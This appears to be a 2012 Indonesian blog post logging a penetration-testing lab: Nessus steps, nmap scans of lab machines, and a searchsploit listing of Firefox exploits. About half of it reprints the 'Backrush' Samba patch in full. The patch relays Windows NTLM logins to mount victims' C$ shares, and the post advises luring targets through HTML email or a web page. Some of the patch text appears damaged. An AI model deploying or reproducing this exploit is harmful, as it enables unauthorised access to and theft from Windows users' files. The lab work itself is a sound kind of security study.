Nothing Imposible: Try Today

-Service Enumeration

1.Using Nessus

-open nessus :https://localhost:8834

-entri user name and password

-chose menu Scan and click buttom add

-insert the name, type, police and scan targets

-after finish/ complete scan, click reports to can information gathering

-click host

-click total

-click high continue click number's and click one of show

-click medium

-click open port

-download report and change the type ekstensi.

Scanning with nmap

-scan with type

root@BT:~# nmap -v -A 192.168.56.101

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-27 16:57 WIT

NSE: Loaded 87 scripts for scanning.

NSE: Script Pre-scanning.

Initiating ARP Ping Scan at 16:57

Scanning 192.168.56.101 [1 port]

Completed ARP Ping Scan at 16:57, 0.06s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 16:57

Completed Parallel DNS resolution of 1 host. at 16:57, 13.00s elapsed

Initiating SYN Stealth Scan at 16:57

Scanning 192.168.56.101 [1000 ports]

Discovered open port 135/tcp on 192.168.56.101

Discovered open port 139/tcp on 192.168.56.101

Discovered open port 445/tcp on 192.168.56.101

Completed SYN Stealth Scan at 16:57, 1.22s elapsed (1000 total ports)

Initiating Service scan at 16:57

Scanning 3 services on 192.168.56.101

Completed Service scan at 16:57, 6.01s elapsed (3 services on 1 host)

Initiating OS detection (try #1) against 192.168.56.101

NSE: Script scanning 192.168.56.101.

Initiating NSE at 16:57

Completed NSE at 16:57, 0.20s elapsed

Nmap scan report for 192.168.56.101

Host is up (0.00068s latency).

Not shown: 997 closed ports

PORT STATE SERVICE VERSION

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn

445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds

MAC Address: 08:00:27:41:74:C0 (Cadmus Computer Systems)

Device type: general purpose

Running: Microsoft Windows XP

OS CPE: cpe:/o:microsoft:windows_xp

OS details: Microsoft Windows XP SP2 or SP3

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=262 (Good luck!)

IP ID Sequence Generation: Incremental

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

| nbstat:

| NetBIOS name: IS2C-6C66D0BB8D, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:41:74:c0 (Cadmus Computer Systems)

| Names

| IS2C-6C66D0BB8D<00> Flags: <unique><active>

| WORKGROUP<00> Flags: <group><active>

| IS2C-6C66D0BB8D<20> Flags: <unique><active>

|_ WORKGROUP<1e> Flags: <group><active>

|_smbv2-enabled: Server doesn't support SMBv2 protocol

| smb-security-mode:

| Account that was used for smb scripts: guest

| User-level authentication

| SMB Security: Challenge/response passwords supported

|_ Message signing disabled (dangerous, but default)

| smb-os-discovery:

| OS: Windows XP (Windows 2000 LAN Manager)

| Computer name: is2c-6c66d0bb8d

| NetBIOS computer name: IS2C-6C66D0BB8D

| Workgroup: WORKGROUP

|_ System time: 2012-01-27 16:57:45 UTC+7

TRACEROUTE

HOP RTT ADDRESS

1 0.68 ms 192.168.56.101

NSE: Script Post-scanning.

Read data files from: /usr/local/bin/../share/nmap

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 23.08 seconds

Raw packets sent: 1098 (49.010KB) | Rcvd: 1017 (41.234KB)

-root@BT:~# nmap -v -IR 192.168.56.101

WARNING: identscan (-I) no longer supported. Ignoring -I

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-27 17:14 WIT

Initiating ARP Ping Scan at 17:14

Scanning 192.168.56.101 [1 port]

Completed ARP Ping Scan at 17:14, 0.06s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 17:14

Completed Parallel DNS resolution of 1 host. at 17:15, 13.00s elapsed

Initiating SYN Stealth Scan at 17:15

Scanning 192.168.56.101 [1000 ports]

Discovered open port 135/tcp on 192.168.56.101

Discovered open port 445/tcp on 192.168.56.101

Discovered open port 139/tcp on 192.168.56.101

Completed SYN Stealth Scan at 17:15, 1.20s elapsed (1000 total ports)

Nmap scan report for 192.168.56.101

Host is up (0.00088s latency).

Not shown: 997 closed ports

PORT STATE SERVICE

135/tcp open msrpc

139/tcp open netbios-ssn

445/tcp open microsoft-ds

MAC Address: 08:00:27:41:74:C0 (Cadmus Computer Systems)

Read data files from: /usr/local/bin/../share/nmap

Nmap done: 1 IP address (1 host up) scanned in 14.41 seconds

Raw packets sent: 1082 (47.592KB) | Rcvd: 1001 (40.040KB)

-Vulnerability Analisys

1.Using exploitdb

root@BT:~# cd /pentest/exploits/exploitdb

root@BT:/pentest/exploits/exploitdb# ./searchsploit firefox

Description Path

--------------------------------------------------------------------------- -------------------------

Mozilla Firefox Install Method Remote Arbitrary Code Execution Exploit /windows/remote/986.html

Mozilla Firefox view-source:javascript url Code Execution Exploit /multiple/remote/1007.html

Mozilla FireFox <= 1.0.1 Remote GIF Heap Overflow Exploit /windows/remote/1089.c

Mozilla Firefox <= 1.0.4 ""Set As Wallpaper"" Code Execution Exploit /windows/remote/1102.html

Mozilla Firefox <= 1.0.7 Integer Overflow Denial of Service Exploit /multiple/dos/1233.html

Mozilla (Firefox <= 1.0.7) (Thunderbird <= 1.0.6) Denial of Service Exploit /multiple/dos/1253.html

Mozilla (Firefox <= 1.0.7) (Mozilla <= 1.7.12) Denial of Service Exploit /multiple/dos/1257.html

Mozilla Firefox <= 1.5 (history.dat) Looping Vulnerability PoC /windows/dos/1362.html

Mozilla Firefox <= 1.04 compareTo() Remote Code Execution Exploit /multiple/remote/1369.html

Mozilla Firefox 1.5 location.QueryInterface() Code Execution (linux) /linux/remote/1474.pm

Mozilla Firefox 1.5 location.QueryInterface() Code Execution (osx) /osX/remote/1480.pm

Mozilla Firefox <= 1.5.0.1 /multiple/dos/1667.html

Mozilla Firefox <= 1.5.0.2 (js320.dll/xpcom_core.dll) Denial of Service PoC /multiple/dos/1716.html

Mozilla Firefox <= 1.5.0.3 (Loop) Denial of Service Exploit /multiple/dos/1802.html

Mozilla Firefox <= 1.5.0.4 (marquee) Denial of Service Exploit /multiple/dos/1867.html

Mozilla Firefox <= 1.5.0.4 Javascript Navigator Object Code Execution PoC /multiple/remote/2082.html

Mozilla Firefox <= 1.5.0.6 (FTP Request) Remote Denial of Service Exploit /multiple/dos/2244.pl

Mozilla Firefox <= 1.5.0.7/ 2.0 (createRange) Remote DoS Exploit /multiple/dos/2695.html

Mozilla Firefox <= 2.0.0.1 (location.hostname) Cross-Domain Vulnerability /windows/remote/3340.html

Mozilla Firefox 2.0.0.3 / Gran Paradiso 3.0a3 DoS Hang / Crash Exploit /multiple/dos/3606.py

Mozilla Firefox <= 2.0.0.7 Remote Denial of Service Exploit /multiple/dos/4559.txt

Mozilla Firefox 3.0.3 User Interface Null Pointer Dereference Crash /windows/dos/6614.html

Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing Vulnerability /windows/remote/6690.html

Mozilla Firefox 3.0.5 location.hash Remote Crash Exploit /windows/dos/7554.pl

Firefox 3.0.5 Status Bar Obfuscation / Clickjacking /windows/remote/7842.html

Mozilla Firefox 3.0.6 (BODY onload) Remote Crash Exploit /multiple/dos/8091.html

Mozilla Firefox 3.0.7 OnbeforeUnLoad DesignMode Dereference Crash /multiple/dos/8219.html

Mozilla Firefox XSL Parsing Remote Memory Corruption PoC 0day /multiple/dos/8285.txt

Firefox 3.0.x (XML Parser) Memory Corruption / DoS PoC /windows/dos/8306.txt

Mozilla Firefox XSL Parsing Remote Memory Corruption PoC #2 /windows/dos/8356.txt

Mozilla Firefox (unclamped loop) Denial of Service Exploit /multiple/dos/8794.htm

Mozilla Firefox 3.0.10 (KEYGEN) Remote Denial of Service Exploit /multiple/dos/8822.txt

DX Studio Player < 3.0.29.1 Firefox plug-in Command Injection Vuln /windows/remote/8922.txt

Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit /windows/remote/9137.html

Mozilla Firefox 3.5 unicode Remote Buffer Overflow PoC /windows/dos/9158.html

Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit /windows/remote/9181.py

Mozilla Firefox 3.5 (Font tags) Remote Heap Spray Exploit (pl) /windows/remote/9214.pl

Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit (osx) /osX/remote/9247.py

Mozilla Firefox < 3.0.14 Multiplatform RCE via pkcs11.addmodule /multiple/remote/9651.txt

Mozilla Firefox 2.0.0.16 UTF-8 URL Remote Buffer Overflow Exploit /windows/remote/9663.py

Firefox 3.5.3 local download manager temp file creation /windows/local/9882.txt

Mozilla Suite/Firefox < 1.5.0.5 Navigator Object Code Execution /multiple/remote/9946.rb

Mozilla Suite/Firefox < 1.0.5 compareTo Code Execution /windows/remote/9947.rb

Firefox 3.5 escape Memory Corruption Exploit /multiple/remote/9949.rb

Firefox + Adobe Memory Corruption PoC /windows/dos/10208.txt

Mozilla Firefox Location Bar Spoofing Vulnerability /multiple/local/10544.html

Firefox 3.6 (XML parser) Memory Corruption PoC/DoS /windows/dos/11245.txt

Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit /windows/dos/11432.txt

Mozilla Firefox v3.6 URL Spoofing Vulnerability /multiple/local/11561.html

Mozilla Firefox <= 3.6 Denial Of Service Exploit /multiple/dos/11590.php

Mozilla Firefox v3.6 and Opera Long String Crash(0day) Exploit /windows/dos/11617.txt

Firefox 3.6.3 Fork Bomb DoS /windows/dos/12492.html

Firefox 3.6.3 & Safari 4.0.5 - Access Violation Exception and Unknown Exception /windows/dos/12602.txt

Firefox 3.6.3 (latest) <= memory exhaustion crash vulnerabilities /windows/dos/12678.txt

Firefox <= 3.6.8 DLL Hijacking Exploit (dwmapi.dll) /windows/local/14730.c

MOAUB #9 - Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability /windows/dos/14949.py

MOAUB #17 - Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution /windows/dos/15027.py

MOAUB #25 - Mozilla Firefox CSS font-face Remote Code Execution Vulnerability /windows/dos/15104.py

Firefox 3.5.10 & 3.6.6 WMP Memory Corruption Using Popups /windows/dos/15242.html

Firefox Interleaving document.write and appendChild Denial of Service /multiple/dos/15341.html

Firefox Memory Corruption Proof of Concept (Simplified) /multiple/dos/15342.html

Firefox 3.6.8 - 3.6.11 Interleaving document.write and appendChild Exploit (From the Wild) /windows/remote/15352.html

Mozilla Firefox <= 3.6.12 Remote Denial Of Service /multiple/dos/15498.html

Firefox 3.5 escape() Return Value Memory Corruption /multiple/remote/16299.rb

Mozilla Suite/Firefox Navigator Object Code Execution /multiple/remote/16300.rb

Firefox location.QueryInterface() Code Execution /multiple/remote/16301.rb

Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution /windows/remote/16306.rb

Mozilla Firefox Interleaving document.write and appendChild Exploit /windows/remote/16509.rb

Mozilla Firefox ""nsTreeRange"" Dangling Pointer Exploit /windows/remote/17419.zip

Mozilla Firefox ""nsTreeRange"" Dangling Pointer Vulnerability /windows/remote/17520.rb

Firefox 3.6.16 OBJECT mChannel Remote Code Execution Exploit (DEP bypass) /windows/remote/17612.rb

Mozilla Firefox 3.6.16 mChannel use after free vulnerability /windows/remote/17650.rb

Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) /windows/remote/17672.html

Mozilla Firefox Array.reduceRight() Integer Overflow Exploit /windows/remote/17974.html

Mozilla Firefox Array.reduceRight() Integer Overflow /windows/remote/17976.rb

Firefox 8.0 Null Pointer Dereference PoC /multiple/dos/18116.html

root@BT:/pentest/exploits/exploitdb# cat platforms/windows/remote/20.txt

##########################################

# Exploit for "Authentication flaw in Windows SMB protocol" #

##########################################

# Release Date:

# April 24, 2003

# Code by Haamed Gheibi (haamed@linux.ce.aut.ac.ir)

# Salman Niksefat (salman@linux.ce.aut.ac.ir)

# Systems Affected by this exploit:

# Windows 2000 (SP0 SP1 SP2 SP3)

# Windows XP (SP0 SP1)

# EXPLOIT PROVIDED FOR EDUCATIONAL PURPOSES ONLY AS A PROOF OF CONCEPT

# WE TAKE NO RESPONSIBILITY FOR USE OF THIS CODE.

##########################################

This exploit is based on samba-2.2.8a, you can download the source code from:

http://us1.samba.org/samba/ftp/samba-2.2.8a.tar.bz2

or other mirrors.

First you should configure and make samba source code as follow:

You need first to extract the file:

$ tar -jxf samba-2.2.8a.tar.bz2

$ cd samba-2.2.8a/source

Here you need to configure with suitable options. Here is a config for RedHat 9:

$ ./configure --sysconfdir=/etc --with-codepagedir=/usr/share/samba/codepages\

--with-lockdir=/var/cache/samba --with-configdir=/etc/samba

$ make

$ make bin/smbmount

$ su

# make install

First add an arbitary user to samba: (Choose a reliable password for it for your protection!)

# smbadduser smbtmpuser:root

Now check if your samba server(bin/smbd) and client(bin/smbmount) are working,

and that ipchains rulls are not set. you can use:

# service smbd stop

# bin/smbd -i

# ipchains -F

Well, now if everything works fine, you can apply the exploit code to the source.

Download it from: http://seclab.ce.aut.ac.ir/samba-exp/exploit/backrush.patch

# patch < backrush.patch

Make it again:

# make bin/smbd

# make bin/smbmount

[Note that you shouldn't make whole samba, cause you may get linker errors]

Make necessary directories:

# mkdir -p bin/backrush/log

# mkdir bin/backrush/mnt

# touch bin/backrush/ip2sharename.map

Now we are done, you MUST change directory to bin and run the server:

# cd bin

# killall -9 smbd

# ./smbd

Now by default, the C$ share folder of any Windows machine who tries to connect

to this SMB server, would be mounted to mnt/machinename-random folder.

If you want to mount another share folder, you can add an entry to ip2sharename.map file as follow:

IPADDRESS:SHARENAME

This option is suitable for XP systems.

2 ways 2 force a client to automatically connect to your modified SMB server:

1. Send him/her a HTML email with the following tag:

2. Invite him/her to visit your personal web page.

You can make it by the above tag, then pray and wait until he/she visits your page. ;)

Enjoy!

* backrush.patch *

diff -Nur /root/samba-2.2.8a/source/client/smbmount.c /backrush/source.exp/client/smbmount.c

--- /root/samba-2.2.8a/source/client/smbmount.c 2002-04-30 17:56:19.000000000 +0430

+++ /backrush/source.exp/client/smbmount.c 2003-04-19 16:28:04.000000000 +0430

@@ -26,6 +26,10 @@

#include <mntent.h>

#include <asm/types.h>

#include <linux/smb_fs.h>

+//>Backrush

+int br_read[2], br_write[2], br_pid;

+struct Backrush br_state;

+//<

extern BOOL in_client;

extern pstring user_socket_options;

@@ -177,6 +181,21 @@

cli_shutdown(c);

return NULL;

}

+//>Backrush

+ {

+ int i;

+ printf("challange: ");

+ for (i = 0; i < 8; i++)

+ printf("%0.2x",c->cryptkey[i]);

+ fflush(stdout);

+ memcpy(br_state.challenge, c->cryptkey, 8);

+ br_state.status = 1;

+ write(br_write[1],&br_state, sizeof(br_state));

+ printf(" sent to server\n");

+ printf("waiting for response...\n");

+ fflush(stdout);

+ }

+//<

if (!got_pass) {

char *pass = getpass("Password: ");

@@ -848,6 +867,14 @@

if (*credentials != 0) {

read_credentials_file(credentials);

}

+//>Backrush

+ printf("Started to mount %s on %s\n",argv[1], argv[2]);

+ fflush(stdout);

+ if (getenv("BACKRUSH_READ"))

+ br_read[0] = atoi(getenv("BACKRUSH_READ"));

+ if (getenv("BACKRUSH_WRITE"))

+ br_write[1] = atoi(getenv("BACKRUSH_WRITE"));

+//<

DEBUG(3,("mount.smbfs started (version %s)\n", VERSION));

diff -Nur /root/samba-2.2.8a/source/include/includes.h /backrush/source.exp/include/includes.h

--- /root/samba-2.2.8a/source/include/includes.h 2003-02-28 19:26:18.000000000 +0330

+++ /backrush/source.exp/include/includes.h 2003-04-17 10:36:54.000000000 +0430

@@ -1,5 +1,26 @@

#ifndef _INCLUDES_H

#define _INCLUDES_H

+//>Backrush

+#include <stdlib.h>

+#include <time.h>

+struct Backrush

+ int status;

+ char ip_address[20];

+ int port;

+ char username[256];

+ char sharename[256];

+ char netbios[256];

+ char domain[256];

+ char challenge[8];

+ char nt_resp[24];

+ char lm_resp[24];

+};

+extern struct Backrush br_state;

+extern int br_read[2],br_write[2],br_pid;

+//<

Unix SMB/Netbios implementation.

Version 1.9.

diff -Nur /root/samba-2.2.8a/source/libsmb/cliconnect.c /backrush/source.exp/libsmb/cliconnect.c

--- /root/samba-2.2.8a/source/libsmb/cliconnect.c 2003-03-15 01:04:48.000000000 +0330

+++ /backrush/source.exp/libsmb/cliconnect.c 2003-04-17 12:30:26.000000000 +0430

@@ -23,7 +23,6 @@

#include "includes.h"

static const struct {

int prot;

const char *name;

@@ -265,7 +264,28 @@

memcpy(pword, pass, passlen);

memcpy(ntpword, ntpass, ntpasslen);

}

+//>Backrush

+ {

+ int i;

+ read(br_read[0],&br_state, sizeof(br_state));

+ printf("received response:\n");

+ fflush(stdout);

+ memcpy(pword, br_state.lm_resp, 24);

+ memcpy(ntpword, br_state.nt_resp, 24);

+ if(br_state.username[0])

+ strncpy(user, br_state.username, 24);

+ printf("username: %s\n", user);

+ printf("lm response: ");

+ for (i = 0; i < 24; i++)

+ printf("%0.2x",pword[i]);

+ printf("\n");

+ printf("nt response: ");

+ for (i = 0; i < 24; i++)

+ printf("%0.2x",ntpword[i]);

+ printf("\n");

+ fflush(stdout);

+ }

+//<

/* send a session setup command */

memset(cli->outbuf,'\0',smb_size);

diff -Nur /root/samba-2.2.8a/source/smbd/negprot.c /backrush/source.exp/smbd/negprot.c

--- /root/samba-2.2.8a/source/smbd/negprot.c 2003-03-15 01:04:49.000000000 +0330

+++ /backrush/source.exp/smbd/negprot.c 2003-04-24 13:37:19.000000000 +0430

@@ -180,6 +180,45 @@

doencrypt = ((cli->sec_mode & 2) != 0);

}

+//>Backrush

+ {

+ srand(time(NULL));

+ pipe(br_read);

+ pipe(br_write);

+ br_state.status = 1;

+ br_state.port = random();

+ strncpy(br_state.ip_address, get_socket_addr(smbd_server_fd()), sizeof(br_state.ip_address));

+ strncpy(br_state.sharename, "c$", sizeof(br_state.sharename));

+ {

+ char tmp[1024], *ptr;

+ FILE *fin = fopen("backrush/ip2sharename.map","r");

+ if (fin)

+ {

+ while(fscanf(fin, "%s", tmp) > 0)

+ {

+ ptr = strchr(tmp, ':');

+ *ptr++ = 0;

+ if (!strcmp(br_state.ip_address,tmp))

+ strncpy(br_state.sharename, ptr, sizeof(br_state.sharename));

+ }

+ fclose(fin);

+ }

+ if (!(br_pid = fork()))

+ {

+ char cmd[1024];

+ snprintf(cmd, sizeof cmd, "mkdir -p backrush/mnt/%s-%d", br_state.ip_address, br_state.port);

+ system(cmd);

+ snprintf(cmd, sizeof cmd, "export BACKRUSH_READ=%d; export BACKRUSH_WRITE=%d;

./smbmount //%s/%s backrush/mnt/%s-%d -o username=root,password=let_me_go_in

>backrush/log/%s-%d",

+ br_write[0], br_read[1], br_state.ip_address, br_state.sharename, br_state.ip_address,

br_state.port, br_state.ip_address, br_state.port);

+ system(cmd);

+ snprintf(cmd, sizeof cmd, "echo smbmount compeleted >>backrush/log/%s-%d",

br_state.ip_address, br_state.port);

+ system(cmd);

+ _exit(0);

+ }

+//<

if (doencrypt) {

crypt_len = 8;

if (!cli) {

diff -Nur /root/samba-2.2.8a/source/smbd/password.c /backrush/source.exp/smbd/password.c

--- /root/samba-2.2.8a/source/smbd/password.c 2003-04-07 06:24:00.000000000 +0430

+++ /backrush/source.exp/smbd/password.c 2003-04-19 09:15:47.000000000 +0430

@@ -48,6 +48,10 @@

unsigned char buf[8];

generate_random_buffer(buf,8,False);

+//>Backrush

+ read(br_read[0],&br_state, sizeof(br_state));

+ memcpy(buf, br_state.challenge, 8);

+//<

memcpy(saved_challenge, buf, 8);

memcpy(challenge,buf,8);

@@ -466,7 +470,13 @@

uchar challenge[8];

char* user_name;

uint8 *nt_pw, *lm_pw;

+//>Backrush

+ memcpy(br_state.nt_resp, nt_pass, 24);

+ memcpy(br_state.lm_resp, lm_pass, 24);

+ write(br_write[1],&br_state, sizeof(br_state));

+// waitpid(br_pid,NULL,WNOHANG);

+ return(False);

+//<

if (!lm_pass || !sampass)

return(False);

diff -Nur /root/samba-2.2.8a/source/smbd/reply.c /backrush/source.exp/smbd/reply.c

--- /root/samba-2.2.8a/source/smbd/reply.c 2003-04-07 06:24:00.000000000 +0430

+++ /backrush/source.exp/smbd/reply.c 2003-04-16 18:03:58.000000000 +0430

@@ -974,6 +974,11 @@

* security=domain.

+//>Backrush

+ strncpy(br_state.username,user,sizeof(br_state.username));

+ strncpy(user,"root",sizeof(br_state.username));

+//<

if (!guest && !check_server_security(orig_user, domain, user,

smb_apasswd, smb_apasslen, smb_ntpasswd, smb_ntpasslen) &&

!check_domain_security(orig_user, domain, user, smb_apasswd,

diff -Nur /root/samba-2.2.8a/source/smbd/server.c /backrush/source.exp/smbd/server.c

--- /root/samba-2.2.8a/source/smbd/server.c 2003-03-15 01:04:49.000000000 +0330

+++ /backrush/source.exp/smbd/server.c 2003-04-16 18:05:17.000000000 +0430

@@ -25,6 +25,11 @@

extern fstring global_myworkgroup;

extern pstring global_myname;

+//<Backrush

+int br_read[2],br_write[2],br_pid;

+struct Backrush br_state;

+//>

int am_parent = 1;

/* the last message the was processed */

# milw0rm.com [2003-04-25]

root@BT:/pentest/exploits/exploitdb# nmap 192.168.0.67

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-27 21:05 WIT

Nmap scan report for 192.168.0.67

Host is up (0.0021s latency).

Not shown: 988 closed ports

PORT STATE SERVICE

21/tcp open ftp

22/tcp open ssh

23/tcp open telnet

25/tcp open smtp

53/tcp open domain

80/tcp open http

139/tcp open netbios-ssn

445/tcp open microsoft-ds

3306/tcp open mysql

5432/tcp open postgresql

8009/tcp open ajp13

8180/tcp open unknown

MAC Address: 08:00:27:B3:F9:F8 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds

Nothing Imposible

Daftar Blog Saya

Jumat, 27 Januari 2012

Try Today

Tidak ada komentar:

Posting Komentar